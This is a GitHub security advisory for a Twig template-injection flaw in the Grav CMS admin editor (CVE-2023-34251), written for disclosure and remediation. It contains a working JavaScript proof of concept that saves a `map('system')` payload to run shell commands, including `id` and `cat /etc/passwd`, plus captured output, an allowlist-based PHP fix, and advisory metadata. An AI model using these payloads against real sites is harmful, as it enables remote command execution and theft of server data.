ghsa-f9jf-4cp4-4fq5
Vulnerability from github
### Summary
I found an RCE (Remote Code Execution) by SSTI in the admin screen.
### Details
Remote Code Execution is possible: a user with page editing privileges can embed malicious PHP code in a page through the administrator screen.
### PoC
1. Log in to the administrator screen and access the edit screen of the default page "Typography" (`http://127.0.0.1:8000/admin/pages/typography`).
2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.
) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=unique_form_id]").value;
const payload = "{{['id']|map('system')|join}}"; // SSTI Payload
const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", ""); params.append("data[name]", "default"); params.append("data[header][body_classes]", ""); params.append("data[ordering]", 1); params.append("data[order]", ""); params.append("toggleable_data[header][process]", "on"); params.append("data[header][process][twig]", 1); params.append("data[header][order_by]", ""); params.append("data[header][order_manual]", ""); params.append("data[blueprint", ""); params.append("data[lang]", ""); params.append("_post_entries_save", "edit"); params.append("form-name", "flex-pages"); params.append("unique_form_id", id); params.append("admin-nonce", nonce);
await fetch("http://127.0.0.1:8000/admin/pages/typography", { method: "POST", headers: { "content-type": "application/x-www-form-urlencoded", }, body: params, });
window.open("http://127.0.0.1:8000/admin/pages/poc/:preview"); })(); ```
#### Execution Result
- Payload: `{{['id']|map('system')|join}}`
```sh
uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501(<user_name>) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae)
```
- Payload: `{{['cat /etc/passwd']|map('system')|join}}`
#### PoC Video
- [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing)
### Impact
Remote Command Execution (RCE) is possible.
### Occurrences
- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174
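The location above is where a template-supplied value reaches PHP as a callable: in PHP the string `'system'` is itself a valid callable, which is why `['id']|map('system')` runs a shell command. The following is an added illustration, not Grav's or Twig's code: the unsafe shape of such a `map` filter beside a hardened one that only dispatches to a Closure (what a Twig arrow function compiles to) or to a name on an explicit allowlist. `unsafeMap`, `safeMap` and `SAFE_MAP_CALLABLES` are names chosen here; the allowlist contents are an assumption to be tuned per site.

```php
<?php
// Added illustration (not Grav's code). Runs on plain PHP >= 7.4 from the CLI.
declare(strict_types=1);

/**
 * Unsafe: whatever the template passes is handed to array_map() as-is.
 * A plain string such as 'system' is a valid PHP callable, so every array
 * element becomes a command line. This mirrors {{ ['id']|map('system') }}.
 */
function unsafeMap(array $items, $callback): array
{
    return array_map($callback, $items);
}

/** Function names a template author may legitimately apply per element (assumed list). */
const SAFE_MAP_CALLABLES = ['strtoupper', 'strtolower', 'trim', 'ucfirst', 'intval'];

/**
 * Hardened: a Closure (the compiled form of a Twig arrow function) is allowed;
 * a string must be on the allowlist. Any other callable form, including
 * "Class::method" strings and [object, 'method'] arrays, is rejected.
 */
function safeMap(array $items, $callback): array
{
    if ($callback instanceof Closure) {
        return array_map($callback, $items);
    }
    if (is_string($callback) && in_array($callback, SAFE_MAP_CALLABLES, true)) {
        return array_map($callback, $items);
    }
    throw new InvalidArgumentException(
        'map(): callable must be an arrow function or one of '
        . implode(', ', SAFE_MAP_CALLABLES)
    );
}

// The whole bug in one line: PHP considers a bare function name callable.
var_dump(is_callable('system')); // bool(true)

// Constructed sample input; legitimate uses keep working under the hardened filter.
$words = ['grav', 'twig'];
var_dump(safeMap($words, 'strtoupper'));          // ["GRAV", "TWIG"]
var_dump(safeMap($words, fn($w) => strlen($w)));  // [4, 4]
var_dump(unsafeMap($words, 'strrev'));            // unsafe variant, harmless callable here

// Names an attacker would supply are refused before anything is called.
foreach (['system', 'exec', 'passthru', 'shell_exec', 'Some\\Klass::method'] as $name) {
    try {
        safeMap($words, $name);
        echo "UNEXPECTED: {$name} accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: {$name}\n";
    }
}
```

The same shape applies to `filter` and `reduce`, which also take a callable; an allowlist on the name is only meaningful if every string path is covered.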
### References
- [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection)
- [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php)

Advisory record (GitHub Advisory Database, OSV schema 1.4.0):
- ID: GHSA-f9jf-4cp4-4fq5; alias: CVE-2023-34251
- Summary: Grav Server Side Template Injection (SSTI) vulnerability
- Affected package: getgrav/grav (Packagist); affected versions: all versions before 1.7.42 (introduced 0, fixed 1.7.42)
- CWE: CWE-94
- Severity: CRITICAL; CVSS v3.1 vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
- NVD published: 2023-06-14T22:15:09Z; GitHub reviewed, published and last modified: 2023-06-16T19:35:56Z
- Record references:
  - WEB: https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5
  - ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2023-34251
  - WEB: https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec
  - WEB: https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b
  - WEB: https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8
  - WEB: https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5
  - PACKAGE: https://github.com/getgrav/grav
  - WEB: https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.